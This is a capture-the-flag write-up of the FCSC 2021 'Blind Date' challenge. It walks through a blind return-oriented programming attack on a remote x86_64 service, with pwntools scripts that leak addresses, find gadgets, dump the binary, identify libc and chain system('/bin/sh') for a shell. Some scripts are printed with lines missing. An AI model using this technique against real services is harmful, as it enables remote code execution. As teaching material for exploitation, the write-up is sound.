[FCSC 2021] Blind ROP challenge - Blind Date


This challenge was part of the France Cybersecurity Challenge 2021 organized by the ANSSI.

Challenge Description

The goal is to get a shell on the remote host through the listening process.
Usually, we analyze the binary and find the vulnerability. Then, we are able to try our exploit in local and even debug everything using GDB. However, this challenge does not provide any binary so we’re completely blind.

Let’s see how to solve this.


Let’s start by leaking some information

The goal of this first step is to find some addresses so we can try to guess which architecture it is and what security protections are in place.

I tried to send multiples strings to the remote process and got the following responses:

Find the vulnerability

It seems that we have a buffer overflow. What happen here is that the null byte is overwritten and the print function (puts, printf…) is printing the following bytes until the next null byte.

If our buffer is stored into the stack, we could leak the addresses of ebp/rbp and eip/rip. We would then be able to know if we’re in 32bits or 64bits. But also, if a canary is present or if PIE is enabled.

Here is the script I made (by initially supposing the process was running a 64bits addressing which mean jumping 8 bytes at a time).

from pwn import *

def leak_block(payload):
    s = connect('challenges2.france-cybersecurity-challenge.fr', 4008, level="error")

    s.recvuntil(b'>>> ')

    leak = None
    resp = s.recvuntil(b"Bye!", timeout=0.2)
    if b"Bye!" in resp:
        i = len('Thanks ') + len(payload)
        leak = resp[i:-4]
        leak = leak + b"\x00" * (8 - len(leak))

    return leak

def leak_addr():
    payload = b"A" * 8
    for i in range(5):
        r = leak_block(payload)
        if r:
            payload += b"A" * 8

if __name__ == "__main__":

And here is it’s output.


These addresses are all in a canonical form.

By the way, the text segment mapping values are:

  • 0x08048000 on 32 Bits
  • 0x400000 on 64 Bits

So we can deduce that 0x7fffd7cc1180 and 0x4006cc are the values stored on the stack of RBP and RIP, respectively.

Therefore, we are facing an ELF binary runnning on x86_64.

Now, let’s find some gadgets! :D

Finding a stop gadget

What we want is to find a gadget that stops the execution or print a different string. This way, we can know when it has been executed.
I decided to look for a gadget that will send me Hello you. What is your name ? >>> a second time and then wait for my input. Basically, it’s like jumping to the main function again.

Here is the script I used:

def find_stop_gadget():
    for offset in range(BASE, BASE + 0x1000):
        p = connect('challenges2.france-cybersecurity-challenge.fr', 4008, level="error")

        rop_chain = b"A" * 32
        rop_chain += p64(0) # rbp
        rop_chain += p64(offset) # rip
        rop_chain += b"A" * 24

        p.recvuntil(b'>>> ')

            output1 = p.recv(timeout=0.2)
            output2 = p.recv(timeout=0.2)
            if b"Hello you.\nWhat is your name ?\n>>> " in output1 and b"Thanks A" in output2:
                print("Found a stop gadget at " + hex(offset))


if __name__ == "__main__":
    BASE = 0x400000

Which outputs the following result:

Found a stop gadget at 0x400563

Now, we can use this gadget at the end of our ROP chain to check if we get back the control over the process. This will allow us to find a special gadget :D

Finding a BROP gadget

The BROP gadget is composed of 6 instructions that pop the stack into multiples registers. It is present at the end of __libc_csu_init function.

0x0   5b         pop rbx
0x1   5d         pop rbp
0x2   415c       pop r12
0x4   415d       pop r13
0x6   415e       pop r14
0x8   415f       pop r15
0xa   c3         ret

What’s really interesting with this gadget is that we can jump at the middle of the opcodes to get other gadgets!

If we jump at the offset 0x7, the previous gadget becomes:

0x7   5e         pop rsi
0x8   415f       pop r15
0xa   c3         ret

But if we jump at the offset 0x9 then it becomes:

0x9   5f         pop rdi
0xa   c3         ret

So how do we find this special gadget?

We can make a ROP chain that will jump at an offset (which could be the special gadget), then put 6 times 8 bytes on the stack (for pop rbx, pop rbp, pop r12, pop r13, pop r14 and pop r15) and finally the address of our stop gadget.
If we receive Hello you. What is your name ? >>>, it means that the process successfully jumped to our stop gadget and that this offset is potentially our BROP gadget since our 6 values have been poped out.

To be sure, we can repeat this step for the 2 derived gadgets (found offset + 0x7 and found offset + 0x9).

This is my code for this step.

def find_brop_gadget():
    for offset in range(BASE, BASE + 0x1000):
        p = connect('challenges2.france-cybersecurity-challenge.fr', 4008, level="error")

        rop_chain = b"A" * 32
        rop_chain += p64(0) # rbp
        rop_chain += p64(offset) # rip (maybe pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret)
        rop_chain += p64(0) # pop rbx
        rop_chain += p64(0) # pop rbp
        rop_chain += p64(0) # pop r12
        rop_chain += p64(0) # pop r13
        rop_chain += p64(0) # pop r14
        rop_chain += p64(0) # pop r15
        rop_chain += p64(STOP_G)  # rip2 -> stop gadget

            p.recvuntil(b'>>> ')
            resp = p.recv(timeout=0.2)
            if STOP_G_RESP in resp:
                p = connect('challenges2.france-cybersecurity-challenge.fr', 4008, level="error")

                rop_chain = b"A" * 32
                rop_chain += p64(0)  # rbp
                rop_chain += p64(offset + 7)  # rip (maybe pop rsi; pop r15; ret)
                rop_chain += p64(0)  # pop rsi
                rop_chain += p64(0)  # pop r15
                rop_chain += p64(STOP_G)  # rip2 -> stop gadget

                p.recvuntil(b'>>> ')
                resp = p.recv(timeout=0.2)
                if STOP_G_RESP in resp:
                    p = connect('challenges2.france-cybersecurity-challenge.fr', 4008, level="error")

                    rop_chain = b"A" * 32
                    rop_chain += p64(0)  # rbp
                    rop_chain += p64(offset + 9)  # rip (maybe pop rdi; ret)
                    rop_chain += p64(0)  # pop rdi
                    rop_chain += p64(STOP_G)  # rip2 -> stop gadget

                    p.recvuntil(b'>>> ')
                    resp = p.recv(timeout=0.2)
                    if STOP_G_RESP in resp:
                        print("Found a BROP gadget at " + hex(offset))


if __name__ == "__main__":
    BASE = 0x400000
    STOP_G = 0x400563
    STOP_G_RESP = b"What is your name ?\n>>> "

Which outputs the following result:

Found a BROP gadget at 0x40073a

Now we are able to control rdi and rsi registers.

Let’s leak the binary

Finding the right gadget

So we know that the text section is mapped at 0x400000. We can load this address in rdi and repeat the same steps as before (iterating over each possible address in the code segment). Once we receive some data containing ELF, we will know that we found the right gadget.

Here is my code for this step:

def find_leak_gadget():
    for offset in range(BASE, BASE + 0x1000):
        p = connect('challenges2.france-cybersecurity-challenge.fr', 4008, level="error")

        rop_chain = b"A" * 32
        rop_chain += p64(0) # rbp
        rop_chain += p64(BROP_G + 9) # rip -> pop rdi; ret
        rop_chain += p64(BASE) # rdi
        rop_chain += p64(offset) # rip2

        p.recvuntil(b'>>> ')
            res = p.recv(timeout=0.2)
            if b"ELF" in res:
                print("Leaking gadget found at " + hex(offset))


if __name__ == "__main__":
    BASE = 0x400000
    STOP_G = 0x400563
    BROP_G = 0x40073a
    STOP_G_RESP = b"What is your name ?\n>>> "

And here is the associated output:

Leaking gadget found at 0x400663
Leaking gadget found at 0x40066d
Leaking gadget found at 0x400672
Leaking gadget found at 0x4006bd

Retrieving the binary

Now we have every gadget we need to build a ROP chain that will dump the text section.

I used the following logic:

  • Use the BROP gadget to set RDI to control the address we want to leak;
  • Use the Puts gadget to print the bytes stored at this address (the length depends of null bytes);
  • We compute the next address to leak regarding the number of bytes we leaked at the previous step.

This is the script I used:

def leak_text_section(file_name="elf.bin"):
    f = open(file_name, "wb")
    offset = BASE
    while offset < BASE + 0x1000:
        p = connect('challenges2.france-cybersecurity-challenge.fr', 4008, level="error")

        rop_chain = b"A" * 32
        rop_chain += p64(0) # rbp
        rop_chain += p64(BROP_G + 9) # rip -> pop rdi; ret
        rop_chain += p64(offset) # rdi
        rop_chain += p64(PUTS_G) # rip2

        p.recvuntil(b'>>> ')
            output = p.recv(timeout=0.2)[39:]
            if len(output) == 0:
                offset += 1
                offset += len(output)
            offset += 1
            print("Could not retrieve byte at offset " + hex(offset))

if __name__ == "__main__":
    BASE = 0x400000
    STOP_G = 0x400563
    BROP_G = 0x40073a
    PUTS_G = 0x400672
    STOP_G_RESP = b"What is your name ?\n>>> "

Let’s check the file we obtained.

File type of elf.bin

Finding the libc version

Now, we can easily leak 2 libc addresses and compute the offset to find the version that is used.

By opening the elf.bin into Cutter, it is possible to see at which address the GOT is stored.

Got tables addresses

We know that at:

  • 0x600fc8 will be stored the libc address of puts;
  • 0x600fd0 will be stored the libc address of printf.

I made a ROP chain to leak both of these addresses.

def find_libc_version():
    p = connect('challenges2.france-cybersecurity-challenge.fr', 4008, level="error")

    rop_chain = b"A" * 32
    rop_chain += p64(0)  # rbp
    rop_chain += p64(BROP_G + 9)  # rip -> pop rdi; ret
    rop_chain += p64(PUTS_ADDR)  # rdi -> puts address
    rop_chain += p64(PRINTF)  # rip2 -> printf
    rop_chain += p64(BROP_G + 9)  # rip3 -> pop rdi; ret
    rop_chain += p64(PRINTF_ADDR)  # rdi -> printf address
    rop_chain += p64(PRINTF)  # rip4 -> printf

    p.recvuntil(b'>>> ')
    puts_leak, printf_leak = p.recv().lstrip(b'Thanks AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA').split(b'\n')[:2]
    puts_leak = puts_leak + b"\x00" * (8 - len(puts_leak))
    printf_leak = printf_leak + b"\x00" * (8 - len(printf_leak))
    print("Puts libc address : " + hex(u64(puts_leak)))
    print("Puts libc address : " + hex(u64(printf_leak)))


if __name__ == "__main__":
    BASE = 0x400000
    STOP_G = 0x400563
    BROP_G = 0x40073a
    PUTS_G = 0x400672
    PRINTF = 0x00400500
    STOP_G_RESP = b"What is your name ?\n>>> "

    # .got.plt
    PUTS_ADDR = 0x600fc8
    PRINTF_ADDR = 0x600fd0


Which gave me the following results:

Puts libc address : 0x7f592ddb6990
Puts libc address : 0x7f592dd9bcf0

From this, we can compute the difference between both addresses and find a matching library (where both functions have exactly the same difference).

Compute the libc version from offsets

We got only one match which is libc6_2.19-18+deb8u10_amd64. In case we had multiple matches, we could have leaked more addresses.

Now, we have the offset of system but also /bin/sh and can therefore finally compute the last ROP chain needed.

Let’s get a Shell

We now have every thing needed to craft a ROP chain that will give us a shell:

  • BROP gadget to control the registers;
  • GOT base address to leak a libc address;
  • Libc version to compute system and /bin/sh offset;
  • Main function address (from the elf.bin file).

To go further, we actually need to craft 2 ROP chain.
The first one will leak a libc address as we did before and the jump back to the main function. This way, we can exploit again the buffer overflow without reloading the address space (which changes every time because of ASLR).

The second one will put /bin/sh address in rdi and then call system.

Here is my final script:

def give_me_a_shell():
    p = connect('challenges2.france-cybersecurity-challenge.fr', 4008, level="error")

    rop_chain = b"A" * 32
    rop_chain += p64(0)  # rbp
    rop_chain += p64(BROP_G + 9)  # rip -> pop rdi; ret
    rop_chain += p64(PUTS_ADDR)  # rdi -> puts address
    rop_chain += p64(PRINTF)  # rip2 -> puts/printf
    rop_chain += p64(MAIN)  # main for stage 2

    puts_leak = p.recv()[39:-36]
    puts_leak = puts_leak + b"\x00" * (8 - len(puts_leak))
    print("Puts libc address : " + hex(u64(puts_leak)))

    libc_base_addr = u64(puts_leak) - PUTS_OFFSET

    rop_chain = b"A" * 32
    rop_chain += p64(0)  # rbp
    rop_chain += p64(BROP_G + 9)  # rip -> pop rdi; ret
    rop_chain += p64(libc_base_addr + BINSH_OFFSET) # rdi -> /bin/bash in libc
    rop_chain += p64(libc_base_addr + SYSTEM_OFFSET)  # rip2 -> system in libc


if __name__ == "__main__":
    BASE = 0x400000
    STOP_G = 0x400563
    BROP_G = 0x40073a
    PUTS_G = 0x400672
    PRINTF = 0x400500
    MAIN = 0x4006b4
    STOP_G_RESP = b"What is your name ?\n>>> "

    # .got.plt
    PUTS_ADDR = 0x600fc8
    PRINTF_ADDR = 0x600fd0

    # libc
    PUTS_OFFSET = 0x06b990
    SYSTEM_OFFSET = 0x041490
    BINSH_OFFSET = 0x1633e8


Eventually, we are able to open a shell and get the flag!

Get the flag!


This was the first blind ROP challenge I solved, and I hope that it won’t be the last. As always, FCSC challenges were super interesting with a high level of quality. This is one of the events where I learn the most in a short range of time.
I’ll be here next year without hesitation! ;)
